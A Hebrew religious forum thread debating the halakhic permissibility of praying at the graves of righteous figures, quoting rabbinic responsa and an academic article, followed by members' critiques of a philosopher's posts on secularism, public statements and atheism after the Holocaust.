בית פורומים עצור כאן חושבים

דרשנים, היזהרו בדרשותיכם

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-18/7/2017 05:24 לינק ישיר 

מיימוני,

גם הרבי מליובאוויטש זצ'ל שהיה איש הלכה, נהג כמפורסם לשהות בציון חותנו פעמים אין ספור ולשוב לענות אח'כ לשואלים. בודאי לא נעלם ממנו ומגדולים אחרים שנהגו כך איסור 'דורש אל המתים'. מה שאולי נעלמה היא פרשנותם לנושא, שיש לשער שאיננה מנוגדת להלכה. עכ'פ עלינו להזקק לנושא 'כדן לפניהם בקרקע' ולא בפסקנות מגבוה. זאת ועוד: לימוד זכות על ת'ח הוא חיוב ולא רק מידה טובה כבשאר בני אדם (כפי מה שביאר הח'ח בספרו אהבת חסד)ג אייר תשס"ט 


קברי צדיקים ואיסור דורש אל המתים


הרה"ג זלמן מלמד שליט"א


שאלה:

לכבוד הגאון הרב זלמן מלמד שליט"א,

לאור מה שכתוב בחכמת אדם, כלל פט, ס"ז (הלכות עכו"ם): "איסור דורש אל המתים זה שמרעיב עצמו ולן בבתי הקברות כדי שתשרה רוח טומאה עליו. ואותן נשים וכן עמי הארץ שהולכין על קברי מתים וכאילו מדברים עם המתים ואומרים להם צרותיהם קרוב הדבר שהם בכלל זה. ונמצא שיש מן הגאונים היו רוצים לאסור להשתטח על קברי מתים." האם ראוי לבן תורה ללכת על קברי צדיקים? האם אין בכך ע"ז או אבק ע"ז או עבירה על הפסק המפורש של הרמב"ם (בהלכות אבל, ד ד): "... והצדיקים אין בונים להם נפש על קברותיהם שדבריהם הם זכרונם, ולא יפנה אדם לבקר הקברות". ובנפש הרב לר' צבי שכטר, עמ' רנד מצאתי: "מנהג משפחת רבנו הגרי"ד עפ"י הגר"א היה שלא ללכת לבית הקברות על קברי אבות שלא יהא נראה ח"ו כדורש אל המתים." אם כך לגבי קברי אבותיו!, האם אין כאן קל וחומר לגבי קברי צדיקים? והאם מקום טומאה כמו קבר שמטמא באוהל יכול להפוך למקום קדושה כפי שטוענים רבים היום? ולבסוף אם היתה מעלה גדולה לפקוד קברי צדיקים מדוע מקום קבורתו של משה רבינו, גדול הצדיקים, הוסתרה מעם ישראל?

תשובה:
הזוהר בפרשת אחרי מות שואל מדוע בשעה שהעולם צריך לגשמים הולכים אל המתים להתפלל הרי כתוב שאסור לדרוש אל המתים. והוא משיב מה שאסור זה ללכת לקברי רשעים מאומות העולם. אבל ישראל שהם זכאים עליהם קרא שלמה ושבח אני את המתים שכבר מתו, ומה הכוונה שכבר מתו, שבחייהם המיתו עצמם על התורה וכעת הם חיים.
והזהר מאריך ומסביר את הערך של תפילה על קברי צדיקים אך כמובן התפילה צריכה להיות לד' ית' ולבקש מהצדיקים שהם יפעלו בשמים לטובה.

וכך אומרת הגמרא במסכת סוטה שכלב בן יפונה הלך להתפלל על קברי האבות במערת המכפלה שלא יכשל בחטא המרגלים.

ואולם מי שמתפלל בקברי צדיקים צריך להתפלל אל ד' ולא אל הצדיקים אלא לבקש מד' בזכותם של הצדיקים ואז גם נפש הצדיקים פועלת במרומים לטובה. 

תפילה על קברי צדיקים שכרוכה בסכנת נפשות

קברי צדיקים לפי הרב קוק

ועיין עוד כאן:

https://www.biu.ac.il/JH/Parasha/shlach/klei.html

בעניין הביקור בקברי צדיקים *

ד"ר אלכסנדר קליין

המחלקה למתמטיקה

בפרשתנו נאמר על מסע המרגלים: "וַיַּעֲלוּ בַנֶּגֶב וַיָּבֹא עַד חֶבְרוֹן" (יג:כב). רש"י מבאר על פי חז"ל (סוטה לד ע"ב) מדוע הפועל "ויבֹא" הוא בלשון יחיד לעומת "ויעלו" שבלשון רבים: "ויבא עד חברון – כלב לבדו הלך שם ונשתטח על קברי אבות שלא יהא ניסת לחבריו להיות בעצתם". מדברי חז"ל אלה יש שהסיקו שהשתטחות על קברי צדיקים היא לגיטימית, למרות שלכאורה לא חסרות סיבות השוללות נוהג זה, כפי שנבאר להלן.

אסור לדרוש אל המתים

נאמר בתורה: "לֹא יִמָּצֵא בְךָ... דֹרֵשׁ אֶל הַמֵּתִים. כִּי תוֹעֲבַת ה' כָּל עֹשֵׂה אֵלֶּה וּבִגְלַל הַתּוֹעֵבֹת הָאֵלֶּה ה' אֱ‑לֹהֶיךָ מוֹרִישׁ אוֹתָם מִפָּנֶיךָ. תָּמִים תִּהְיֶה עִם ה' אֱ‑לֹהֶיךָ" (דב' יח:י-יג). מי הוא ה"דורש אל המתים"? לפי הגמרא "זה המרעיב עצמו והולך ולן בבית הקברות כדי שתשרה עליו רוח טומאה" (סנהדרין סה ע"ב). וכך פוסק הרמב"ם:

איזהו דורש אל המתים? זה המרעיב את עצמו והולך ולן בבית הקברות כדי שיבוא מת בחלום ויודיעו מה ששאל עליו, ויש אחרים שהם לובשים מלבושים ידועים ואומרים דברים ומקטירים קטורת ידועה וישנים לבדן כדי שיבוא מת פלוני ויספר עמו בחלום. כללו של דבר: כל העושה כדי שיבוא המת ויודיעו, לוקה. [1]

לכאורה איסור זה אינו קשור כלל לביקור בקברי צדיקים. אבל הרב חיים פלטיאל [2] חשש מאיסור דרישה אל המתים, [3] ולפי הרב פיינשטיין "אין להפקיע הקרא דוְדוֹרש אל המתים מפשוטו, דהוא איסור גם מלבקש מהמתים שהם יתפללו עבורנו" . [4] לפיכך בעל 'חכמת אדם' זועם על הנשים הנוהגות לבקר בבתי-קברות ולפנות למתים הקבורים שם להקלת צרותיהן:

אותן נשים, וכן עמי הארץ, שהולכים על קברי מתים, וכאלו מדברים עם המתים ואומרים להם צרותיהם. קרוב הדבר שהם בכלל זה (דורש אל המתים), ונמצא שיש מן הגאונים היו רוצים לאסור להשתטח על קברי מתים.

אבל הוא מסיק שאפשר להתיר את המנהג בתנאי ש"ההולכים שם יתפללו לה' שימלא שאלתם בזכות אבותיו ובזכות הצדיקים". [5] הרב טוקצינסקי מקל עוד ומתיר לפנות לקב"ה ולהציע שהצדיק הקבור ישמש מליץ יושר בינו ובין הקב"ה ואף מתיר לפנות לצדיק עצמו, בתנאי שכוונת הפונה היא שהמת לא ישמש אלא מליץ יושר ולא ידאג בעצמו להתרת צרתו. [6]

מדברי הזוהר [7] עולה היתר גורף: לפי הנאמר שם, האיסור לדרוש אל המתים אינו אמור אלא לגויים שלעולם נקראים מתים אפילו בחייהם, ואילו ישראל, בייחוד הצדיקים, נחשבים חיים, היות שהם חיים בגן עדן. מלבד זה האיסור אמור למבקרים גויים, היות שהם מפעילים כישופים בזמן שהולכים לבתי-קברות, ואילו ישראל הולכים אצל מתיהם בתשובה ותענית, וכוונתם שנשמות המתים יתפללו להשי"ת עליהם, והקב"ה יחוס עליהם. פירושו זה של הזוהר אינו תואם את פשוטו של מקרא.

אסור לבקר בבתי קברות משום דרכי האמורי

במסכת שמחות מובא: "יוצאים לבית הקברות ופוקדים על המתים עד שלשה ימים ואין חוששים משום דרכי האמורי". [8] מכאן מסיק הרדב"ז: "משמע בתוך ג' אין בו משום דרכי האמורי אבל אחר ג' יש בו משום דרכי האמורי". [9] כנראה זאת כוונת הרמב"ם כשפסק "לא יפנה אדם לבקר הקברות". [10] ברם, הרדב"ז משתדל להתיר את הדבר, ובהמשך דבריו הוא מסביר:

פירוש "לבקר הקברות" הוא לפתוח הקבר לפקוד את המת וזה יש בו מדרכי האמורי, אבל לפקוד הקברות מבחוץ אין חשש בזה וכן נהגו כל ישראל לפקוד את מתיהם ולהשתטח על קבריהם.

בדברים האלה הרדב"ז מבקש להתיר את הביקור בבתי הקברות גם אליבא דרמב"ם. אולם מפשוטם של דברי הרמב"ם עולה שמשום דרכי האמורי אין לפקוד קברים כלל מפני שיש בזה סממן של עבודה זרה. כך הבין את דברי הרמב"ם גם החת"ם סופר, והוא מוסיף שאף בימינו, אליבא דרמב"ם, יש להימנע מפקידת הקברים. בביטוי "דרכי האמורי" הכוונה לדרכי הנוצרים. [11]

 

 

יש להימנע מלבקר בבתי קברות עפ"י תורת הסוד

בהלכות תשעה באב כותב הרמ"א: "הולכים על הקברות מיד כשהולכים מבית הכנסת". [12] ברם, המגן אברהם (ס"ק יג) מסתייג ממנהג זה וכותב: "כתב בכתבי האר"י דאין לילך על הקברות אלא לצורך הלווית המת ובפרט אם לא תיקן עוון קרי מתדבקים בו החיצונים". בעל 'חיי אדם' מוסיף שגם לנשים נידות אסור ללכת לבית-הקברות. [13] וכך כותב הגר"א במכתבו לאשתו, כי "שם מתדבקין הקליפות מאוד, וכל שכן בנשים". [14] אבל בעל 'חיי אדם' מציע פתרון מעשי: "יעמדו ברחוק ד' אמות". [15]

אין טעם לבקר בבתי-קברות

הרמב"ם כותב:

מציינים את כל בית הקברות ובונים נפש על הקבר, והצדיקים אין בונים להם נפש על קברותיהם שדבריהם הם זיכרונם, ולא יפנה אדם לבקר הקברות.[16]

וה"כסף משנה" מסביר:

מה שכתב ולא יפנה אדם לבקר הקברות זה סיום מה שכתב שדבריהם הם זיכרונם ולא יפנה אדם לבקר נפש שעל גבי קברותיהם ועל ידי כן יהיו נזכרים, שאינם צריכים שעל ידי דבריהם ומעשיהם הטובים הם נזכרים.

ה"כסף משנה" סבור שלדעת הרמב"ם אין איסור גמור לבקר בבתי הקברות, [17] אלא שאין בזה כל תועלת. כאמור, אין הכרח להבין כך את דברי הרמב"ם.

דעות המחייבות ביקור בבתי-קברות

בניגוד לנאמר לעיל, יש הרואים בפקידת קברים נוהג מקובל ואף רצוי. כבר בתלמוד נזכר המנהג לצאת לבית הקברות כדי לעורר רחמי שמים בעת עצירת גשמים (תענית טז ע"א):

למה יוצאים לבית הקברות? פליגי בה רבי לוי בר חמא ורבי חנינא. חד אמר: הרי אנו חשובים לפניך כמתים, וחד אמר: כדי שיבקשו עלינו מתים רחמים.

להלכה, בהלכות תשעה באב מביא הרמ"א את המנהג ש"הולכים על הקברות מיד כשהולכים מבית הכנסת", ובערב ראש השנה " יש מקומות נוהגים לילך על הקברות ולהרבות שם בתחינות" [18] .

עוד נמצא בתיקוני הזוהר (תיקון שילוח הקן) שכשאין צדיקים אמיתיים בדור, השראת השכינה [נמצאת] על ישֵני עפר בקברם. מחבר הספר "לשם, שבו ואחלמה" כתב שהשכינה שורה בקברי הצדיקים האמיתיים שבחוץ לארץ, ומקומם חשוב כארץ ישראל. מכאן מסיק הרב משה שטרנבוך שיהיה מותר לצאת מארץ ישראל לחוץ לארץ כדי להשתטח על קברי צדיקים. [19] הרב עובדיה יוסף סבור שיש אף משום מצווה בפקידת קברי צדיקים, "ולכן מותר לצאת מארץ ישראל לחוץ לארץ כדי להשתטח על קברי הצדיקים, כיון שדעתו לחזור לארץ ישראל". הוא מסתמך על המדרש הנ"ל שלפיו נשתטח כלב בן יפונה על קברי האבות, ורואה בו פרדיגמה נורמטיבית. [20]

אפשר למנות סיבות נוספות לחיוב ההשתטחות על קברי צדיקים:

         כבוד הוא שבאים לפקוד את ציונו של הנפטר. הלוא בקשה מהמת לשמש מליץ יושר גורמת "כבוד ויקר לצדיק שעושהו שליח מצווה". [21] כמו כן יש לנשמת המת נחת רוח כשבאים לפקוד את מקום משכבה [22] ויש בזה גם משום תועלת למת, שכן דברי שבח הנאמרים עליו בעולם הזה משפיעים על מעמדו בעולם הבא . [23]

         קברו של צדיק הוא מקום "קדוש וטהור", [24] ושם תפילתו נשמעת. [25]

אם כן, נוהג מפוקפק הלכתית ואף מיסטית נהפך למעשה חיובי בהחלט ואף נחשב מצווה עד שהוא מצדיק נסיעה לחוץ לארץ. וידוע כמה התפשט נוהג זה בימינו, עד שהדבר נהפך לנחלת רבים ממש.

 *   כמה מהנושאים שמובאים להלן לובנו בלימוד בחברותא עם חברי, הרב ד"ר יצחק איזק.

[1]   הלכות עבודת כוכבים יא, יג . וראו יורה דעה קעט, יג.

[2]   תלמיד חבר של מהר"ם מרוטנבורג, המאה ה-  13.

[3]   מובא בב"ח, יורה דעה סוף סימן ריז.

[4]   שו"ת אגרות משה חלק או"ח ה סימן מג.

[5]   כלל פט סעיף ז.

[6]   הרב ניסן אהרן טוקצינסקי ספר גשר החייםירושלים תש"ך, חלק א, עמ' שט.

[7]   זוהר כרך ג (ויקרא) פרשת אחרי מות דף עא. וראו גם טעמי המנהגים (תתרסח).

[8]   מסכת שמחות, תחילת פרק שמיני.

[9]   הלכות אבל ד, ד.

[10]           שם.

[11]           שו"ת חתם סופר חלק ב (יו"ד) סימן שלח ד"ה וע"ד הברייתא.

[12]            שולחן ערוך אורח חיים תקנט י.

[13]           חיי אדם ג, לח.

[14]           אגרת הגר"א הנקראת עלים לתרופה ירושלים תש"ס, עמ' לד-לה.

[15]           חיי אדםקלה, כה וראו גם קלח, ה.

[16]           הלכות אבל ד, ד.

[17]           ראו לעיל משום דרכי האמורי .

[18]           שולחן ערוך, שם תקפא.

[19]           אף שבארץ ישראל אין מחסור בקברי צדיקים. אלא "אם מרגיש התעוררות מיוחדת לצדיקים מיוחדים, שלומד מתורתם, לבוא על קברם ממש, יש בזה מצווה" (תשובות והנהגות, ח"ג סימן סא).

[20]           שו"ת יחווה דעת ח לק ה סימן נז.

[21]           שו"ת עטרת פז חלק ראשון כרך א - או"ח, הערות סימן י הערה ו ד"ה ולכאורה עוד .

[22]           ספר חסידים תנ.

[23]           לב אבות דף מא.

[24]           טעמי המנהגים תת רסז בשם המהרי"ל.

[25]           ב"ח, טור יורה דעה ריז ד"ה נדר מישראל.
תוקן על ידי ספרן ב- 18/07/2017 06:16:30
דדווח על תוכן פוגעני

מנותק
נשלח ב-18/7/2017 07:23 לינק ישיר 

בכתיבה למיימוני יש לנהוג כבוד ודרך ארץ, לכל הפחות מדין של "דינא דמלכותא". ומיימוני הוא ת"ח ועוסק בענייני תורה ומצוות, ומלבד שעל כן יש לנהוג כבוד בפנייה אליו, הרי שחובה על כל אדם לדונו לכף זכות, לא פחות מכל אדם אחר. כל מקום שיש חילול ה' אין חולקים כבוד לרב. ק"ו שמקום שהחילול ה' הוא שלא חולקים כבוד לרב - שאין (=אסור לחלוק) חולקים כבוד לדעה של מי שאיננו נמצא פה בכלל, תוך כדי יצירת מחלוקת בתוך המקום הזה. הצגת דעה נחרצת במצבים כאלה* יכולה להיות רק ע"י מי שמוכיח את דבריו בצורה נחרצת, או שמתוך דבריו מוכח (ושאם נשאלהו יוכיח - ) שנחרצותו היא מתוך כווונה "נכונה" - קרי אינטואיציה נחרצת. (או "הרגשה נחרצת" או איך שלא תקראו לזה). מאחר ואני יודע שכאן אין מזיד, אני מבין שאין צורך לערוך ביקורת אינטואיציה או משהו כזה. אבל צריך להיות מודע לעניין. 

*(וכמובן שלגבי הצגת דעה נחרצת במצבים אחרים - הרי שמצב זה אינו אלא פרט המלמד על הכלל).

[תוקן - אך ורק שתי מילים ("(=אסור לחלוק)") - על מנת שזה יהיה מובן]

תוקן על ידי אליקים7241 ב- 18/07/2017 07:24:40
דדווח על תוכן פוגעני

מנותק
נשלח ב-18/7/2017 07:27 לינק ישיר 

ולדעתי הדיון הזה אפילו לא היה צריך לעלותדדווח על תוכן פוגעני

מנותק
נשלח ב-18/7/2017 07:32 לינק ישיר 

אתם מוזמנים להתווכח איתי על כל פרט בעניין מה שכתבתי - רק שתדעו שהויכוח יכול להיות צורם מבחינת טלטלה לכל הנחת יסוד אפשרית (בערך)דדווח על תוכן פוגעני

מנותק
נשלח ב-18/7/2017 17:36 לינק ישיר 

ספרן היקר

איקון ירוק על המקורות ויותר מזה על התזכורת לכתוב במתינות. וכבר אמרו: אל תאמר קבלו דעתי, שהן רשאין ולא אתה.

אך מה אעשה ובמקום שיש חילול השם אין חולקים כבוד לרב, ובמקום שיש עבודה זרה ודרישה אל המתים לא יהיה כך?

ועם כל זאת, אני מקבל את התוכחה. מקוה שאצליח גם לשמור על הכללים האלו.

אשר לרבי האחרון מחב"ד, אכן בעיני תמוה מאד מה שמסופר עליו שעשה. אבל זה לא מתחיל ממנו, אלא ממקובלים קודמיו שטענו שבביקור בקבר ניתן לעמוד בקשר עם המת. מעתה עלינו לשאול, אם אנו מאמינים שבאמת עברו המבקרים חוויה מסויימת, מה טיבה של אותה חוויה, מה היא כללה מבחינה פנומנולוגית, ואיך אפשר לבאר אותה. זה שהצדיק הנפטר מתגלה לצדיק המבקר זו אפשרות אחת, אבל עד כמה שאני מבין זו אפשרות שגויה.

לגבי המחלוקות בנושא, ובכן, זו לא הפעם הראשונה ובוודאי לא הפעם האחרונה שהנושא הזה יעלה כאן. ויפה ציינת לכמה וכמה מקורות ראשיים בתחום. חלק מן הדיון יוביל לשאלות על אמינות. האם הזוהר הוא מקור אמין לתיאוריות והלכות, למשל.

כל זה אומר שאם אני כותב נגד התופעה וממילא נגד אלו שנוהגים בדרישה אל הקברים, אין לי מה לפנות אלא אל הסוברים כמוני...

שהרי זה שיש פסוק וזה שיש הלכות לא יעכב את האפשרות לדרוש את כולם מחדש. ומי שהורגל בדרשנות זו וכזו, בעיניו זה הפשט וכל המשנה הוא מן המתמיהים או גרוע מזה.

***
אליקים

תודה, אבל יש לציין שספרן הוא ת"ח מפורסם...

_________________

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");
דדווח על תוכן פוגעני

מנותק
נשלח ב-10/10/2017 18:09 לינק ישיר 

הגיע הזמן לחזור ולטעום מחכמת ד"ר משה רט שמידי פעם שובר שיאים משעשעים


"כתבתי כבר על כך שלפי השוואת גילאים, החילוניות לעומת היהדות היא כמו בת שנתיים לעומת בת 33. המאבק נגד "הדתה" הוא בעצם המרד של גיל שנתיים האיום: התינוקת, שעד עכשיו התייחסה בהערכה לעולמם של הוריה (כבוד לתנ"ך, למורשת, לארון הספרים היהודי וכדו'), מחליטה שהיא רוצה להיות עצמאית, וצועקת "אני לבד!". די משעשע לראות אותה מנסה לבנות את עולמה בכוחות עצמה, מכניסה את שתי הרגליים לאותו מכנס ונתקעת עם הראש בתוך השרוול, כשהיא בטוחה שהנה היא עלתה על משהו חדש ונפלא שלא היה כמוהו. רק חבל על כל הנפילות והטעויות שהיא תעשה בדרך עד שתבין שבכל זאת יש קצת מה ללמוד מההורים הבוגרים בעלי הניסיון של 3300 שנה."


הוא רק שכח שאת אותם הדברים בדיוק הוא יכול היה לכתוב לאברהם אבינו שמרד בפסיליו העתיקים של אביו.

הנה כך זה יראה:

כתבתי כבר על כך שלפי השוואת גילאים, האברהמיות  לעומת האלילות  היא כמו בת שנתיים לעומת בת 33.
המאבק נגד  ההדתה הוא בעצם המרד של גיל שנתיים האיום: התינוק האברהמי , שעד עכשיו התייחס בהערכה לעולמם של הוריו (כבוד לפסל, למורשת, לארון הספרים האלילי וכדו'), מחליט שהוא רוצה להיות עצמאי, וצועק "אני לבד!". די משעשע לראות אותו מנסה לבנות את עולמו בכוחות עצמו, מכניס את שתי הרגליים לאותו מכנס ונתקע עם הראש בתוך השרוול, כשהוא בטוח שהנה הוא עלה על משהו חדש ונפלא שלא היה כמוהו. רק חבל על כל הנפילות והטעויות שהוא יעשה בדרך עד שיבין שבכל זאת יש קצת מה ללמוד מההורים הבוגרים בעלי הניסיון של יותר מ3300 שנה. "באמת משעשע ,משה רט.


תוקן על ידי אפריםבן ב- 10/10/2017 18:10:57
דדווח על תוכן פוגעני

מחובר
נשלח ב-27/2/2018 15:23 לינק ישיר 

ומתי אם לא בערב תענית אסתר וחג פורים (לבכות או לצחוק ) מתאים להביא עוד הגיג שממחיש את חכמת הד"ר לפילוסופיה מבר אילן משה רט. (פ"ב)

"האט ער געזאגט

 נראה לי שמבין כל הפוביות של ימינו, החזקה ביותר היא האמירופוביה - הפחד מפני אמירות.

איזו היסטריה פורצת כל פעם שמישהו אומר משהו. שמעתם מה הרב ההוא אמר על נשים? ומה האומן ההוא אמר על מתנחלים? ומה הפרופסור ההוא אמר על חיילים? ומה המתנחלת ההיא אמרה על ערבים? שומו שמיים והתרועעי ארץ! ומכל אמירה עושים כותרות, ומחוללים סערות, ודנים ודשים ומפרשים, וכותבים מאמרי דעה בעד ונגד, ודורשים התנצלויות והבהרות, ועושים קמפיינים מתוקשרים וכן הלאה,
כאילו העובדה שמישהו אמר משהו פירושה שמחר בבוקר יפשטו קלגסים במדים על בתינו ויאכפו על כולנו את עמדותיו, אם לא נתעשת ונפעל מיידית.
צריך לזהות תהליכים, לא? נו בחייכם.
אפילו לאמירות של הקדוש ברוך הוא לא מתייחסים בכזו רצינות.
אני מציע לכולם לאמץ את משפט הקסם הבא, ובכל פעם שמישהו בא אליכם נסער ושואל ''שמעתם מה ההוא אמר???'', פשוט תחייכו ותפטירו: האט ער געזאגט - אז הוא אמר. עובד כמו קסם, והופך את החיים לרגועים ונעימים הרבה יותר, ללא אמירופוביה."

עד כאן הפוסט

בפוסט הזה משה רט בונה (,כמעט כרגיל אצלו , ) תיזה שקרית ומכביר עליה מילים ורוב המגיבים שלו כמובן לא מבחינים ובולעים את הטענות חסרות הבסיס שלו.

נדמה לי שהכשלים  ברורים אך אפרט בכל אופן.

ניקח דוגמה לאמירה מהזמן האחרון: הרב קלנר השמיע אמירות שמזלזלות בנשים. (כמובן שהוא מסתמך על הרב קוק )

האמירה שלו עוררה הדים רבים בכל אמצעי התקשורת.
האם ההדים הרבים האלה נאמרו מתוך פחד ? כמובן שלא. כלי התקשורת תקפו את הרב על אמירותיו השובניסטיות לא מתוך פחד אלא מתוך כעס או פליאה על ההתבטאויות .
חולני .ולכן כשקרא לזה ד"ר רט "אמירופוביה" זה מגוחך כי פוביה פרושה פחד חולני שאינו מוצדק מבחינה רציונאלית .  

אם נעזוב בצד את ה"אמירופוביה" המגוחכת הרי גם עצם הטיעון הוא טיפשי שהרי כבר נאמר: "מוות וחיים ביד הלשון"כלומר לאמירות יש חשיבות גדולה מאד כי לעיתים יש להן השלכות  מסוכנות. (במיוחד אמירות  מסיתות  שיכולות להשפיע על מעשים .ע"ע רצח רבין.)

לאיזה קטגוריה שייכות אמירותיו של הד"ר עצמו ?  עליו אכן ניתן לומר: האט ער געזאגט. 

תוקן על ידי אפריםבן ב- 27/02/2018 16:06:03
דדווח על תוכן פוגעני

מחובר
נשלח ב-16/4/2018 17:10 לינק ישיר 

גם יום השואה סיפק למיודעינו הד"ר מבר אילן  הזדמנות פז לדרשנות מגוחכת כהרגלו בקודש (ובחול.)
הפעם הוא הכניס את הדרשה לפיהם של שתי דמויות בדיוניות שחביבות עליו שלקוחות מעולם סרטי האימה ,הבדיון והקומיקס (שהוא מרבה להתעסק בהם כפי שניתן ללמוד מהפוסטים שלו בפ"ב:)

 "נו, נגמר כבר חג האתאיסטים?" שאל ג'ק.
"אתה מתכוון ליום השואה?" שאלה אלתיאה.
"כן", אמר ג'ק. "היום בו האתאיסטים חוגגים סביב ההוכחה-כביכול לאמונתם. חשבת פעם כמה מעוות זה להחזיק באמונה שנזקקת לדברים כמו השואה כדי להצדיק את עצמה? מה היו עושים האתאיסטים בעולם שכולו טוב? היו צריכים להתאמץ ולמצוא בכוח איזשהו רע כדי לכפור באלוקים. עכשיו שקורים דברים כמו השואה, הם יכולים לנשום לרווחה".
"נראה לי שאתה הופך את סדר הדברים", אמרה אלתיאה. "אתה מתייחס לאתאיזם כאל אמונה בסיסית ואל השואה כהצדקה עבורה. אבל לפחות עבור חלק מהאתאיסטים, האתאיזם הוא פשוט המסקנה המתבקשת מהשואה: אם היו חיים בעולם שכולו טוב, הם באמת לא היו אתאיסטים".
"שטויות", אמר ג'ק. "למה שהשואה תוביל למסקנה של אתאיזם?"
"כי אנשים לא מבינים איך יתכן שאלוקים כל-יכול ייתן למיליוני אנשים למות כך".
"אם לא שמת לב, כל בני האדם מתים מתישהו. מה ההבדל בין ששת המיליונים לבין מיליארדי בני האדם שמתו מתחילת הבריאה? אילו הם לא היו נספים בשואה, הם היו חיים לנצח?"
"זו פחות שאלה על המוות", אמרה אלתיאה, "ויותר על הסבל שלהם ושל בני משפחותיהם. אנשים לא מבינים למה שאלוקים יגרום או יאפשר כל כך הרבה סבל".
"ברור שהם לא מבינים", אמר ג'ק. "הם בני אדם; למה הם מצפים בכלל להבין את דרכי האל?"
"לא רק בני אדם לא מבינים למה היתה שואה", אמרה אלתיאה ברוגזה קלה. "אפילו מיכאל לא יודע את ההסבר לכך".
"אני דווקא כן יודע".
"כן? איך בדיוק אתה יודע?"
"דיברתי עם אברקסס. הוא הסביר לי".
"אברקסס!" אמרה אלתיאה בהפתעה. "ומה הוא אמר לך?"
ג'ק רכן לעבר אלתיאה ולחש באוזנה. עיניה התרחבו. "וואו, באמת?" אמרה. "זה נשמע הגיוני... אבל בחיים לא הייתי חושבת על זה". "את מבינה", הוא אמר. "אפילו את לא היית חושבת על זה, אבל בני אדם חושבים שאם הם לא הצליחו למצוא הסבר הגיוני לשואה, אז זה מוכיח שאין אלוקים. יוהרה כה גדולה ביצורים כה קטנים".
אלתיאה שתקה לרגע. "בכל מקרה, ברור שאי אפשר לגלות להם את התשובה הזו", אמרה.
"ברור", אמר ג'ק. "ובינינו, הם גם לא באמת רוצים לדעת. הם מעדיפים את הפוזה המיוסרת של איוב המטיח דברים כלפי מעלה על פני קבלת תשובה הגיונית שתסתום להם את הפה". "אולי אתה צודק", נאנחה אלתיאה.
"בעניין אחר", אמר ג'ק. "שמעת שלירז נפטר?"
"כן, שמעתי".
"זו היתה הפתעה גמורה. הוא היה כל כך צעיר!", אמר ג'ק. "ג'ק", אמרה אלתיאה. "אכפת לך לפחות לנסות להסתיר את נימת הקנאה בקולך כשאתה מדבר על מקרים כאלה?"

#גק_ואלתיאה 

גם בפוסט הזה הד"ר מבר אילן משה רט ממציא איש קש ותוקף אותו בכלים כבדים כדי להוכיח את התיזה ההזויה שלו.
משה רט  יודע שאתאיסטים רציניים לא טוענים את הטענה הזאת בקשר לשואה.
הרי אין דבר יותר טיפשי מבחינה רציונלית לומר שהשואה מוכיחה שאין אלוהים. 

(אם יש אנשים שאכן איבדו את אמונתם בעקבות השואה זה קרה להם רק מסיבות רגשיות ולא מסיבות רציונליות.)


אבל זו דרכו של הד"ר מבר אילן להלחם באתאיסטים -הוא מעלה טענות ילדותיות כי הוא יודע שאת העוקבים הנאמנים שלו בפייסבוק  הוא יכול להאכיל כל דבר והם כמובן יתנו לו  לייק,  (אגב,האמו"ר מליובביטש טוען כידוע,בצדק , שמבחינת  המאמינים לא תתכן שואה בלי אלוהים.)דדווח על תוכן פוגעני

מחובר
נשלח ב-17/4/2018 00:28 לינק ישיר 

אפרים בן

סבורני שהייתי מאבד הרבה מהעונג שיש בקריאת ראט אילולא היית טורח.

לצערי לא הבנתי כלום.

מי הם ג'ק ואלתיאה? גיבורים של איזה קומיקס?

האם מיכאל הוא מלאך על בשמים של הטובים? האם אברקסס הוא אחד מן המלאכים המורדים או חבר במערכת גנוסטית של הרע נגד הטוב?

מה הסוד שיכול להסביר הכל אבל אתאיסטים לא באמת רוצים לדעת?

ותיקון טעות: נראה לי שהשואה היא בהחלט נימוק לטובת האתאיזם. אני מסכים שכל מקרה מוות וכל ייסורים הם חלק מבעית הרע, אבל השואה היתה מכה יותר מדי קשה. כמובן, כל קושיה צריך לעבד מבחינה פילוסופית.

אשר לויכוח עם איש קש, אני מסכים שראט לא תמיד טורח להציג בצורה הטובה ביותר את אנשי ריבו. אבל זה עדיין מהנה לקרוא ויכוח שבו מנצחים בקלות מי שחושב אחרת, הלא כן? רק צריך לא להתרגל להאמין שאלו תשובות טובות, כדבריך.

_________________

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");
דדווח על תוכן פוגעני

מנותק
נשלח ב-17/4/2018 11:53 לינק ישיר 

השואה אינה מוכיחה כי אין אלוקים- להפך.
השואה מוכיחה כי רוב גדול של החרדים הם אתאיסטים ולא מאמינים באלוקים.דדווח על תוכן פוגעני

מנותק
נשלח ב-17/4/2018 13:11 לינק ישיר 

מיימוני כתב:
אפרים בן

סבורני שהייתי מאבד הרבה מהעונג שיש בקריאת ראט אילולא היית טורח.

לצערי לא הבנתי כלום.

אם לא הבנת כלום על איזה עונג אתה מדבר?מי הם ג'ק ואלתיאה? גיבורים של איזה קומיקס?

האם מיכאל הוא מלאך על בשמים של הטובים? האם אברקסס הוא אחד מן המלאכים המורדים או חבר במערכת גנוסטית של הרע נגד הטוב?

לשמחתי אין לי מושג  מן הסתם תוככל למצוא את התשובות בויקיפדיה. אבל הנושא הוא האתאיסטים והשואה ולא דמויות קומיקס.


מה הסוד שיכול להסביר הכל אבל אתאיסטים לא באמת רוצים לדעת?

את הסוד (איש הקש ) הוא מגלה בתוך הפוסט. ארחיב בהודעה הבאה  .ותיקון טעות: נראה לי שהשואה היא בהחלט נימוק לטובת האתאיזם. אני מסכים שכל מקרה מוות וכל ייסורים הם חלק מבעית הרע, אבל השואה היתה מכה יותר מדי קשה. כמובן, כל קושיה צריך לעבד מבחינה פילוסופית.

אתה מוזמן לעבד מבחינה פילוסופית זה יכול להיות מעניין.

 השואה היא קיום הבטחה שכתובה בתורה. גם המבול בשעתו הרס את כל האנושות בגלל חטאים. לכן זאת שטות לטעון שלמאמינים יש בעיה רציונלית בנושא של השואה.  

אשר לויכוח עם איש קש, אני מסכים שראט לא תמיד טורח להציג בצורה הטובה ביותר את אנשי ריבו. אבל זה עדיין מהנה לקרוא ויכוח שבו מנצחים בקלות מי שחושב אחרת, הלא כן? רק צריך לא להתרגל להאמין שאלו תשובות טובות, כדבריך._________________אין כאן שאלה של ניצחון ואין כאן שאלה   של הרגל ואין כאן שאלה של אמונה. יש כאן טענה שטותית של ראט שמתארכת לפוסט  שלם המלא בכשלי חשיבה. אם זה גורם לך לעונג שיהיה לך לבריאות.  . 


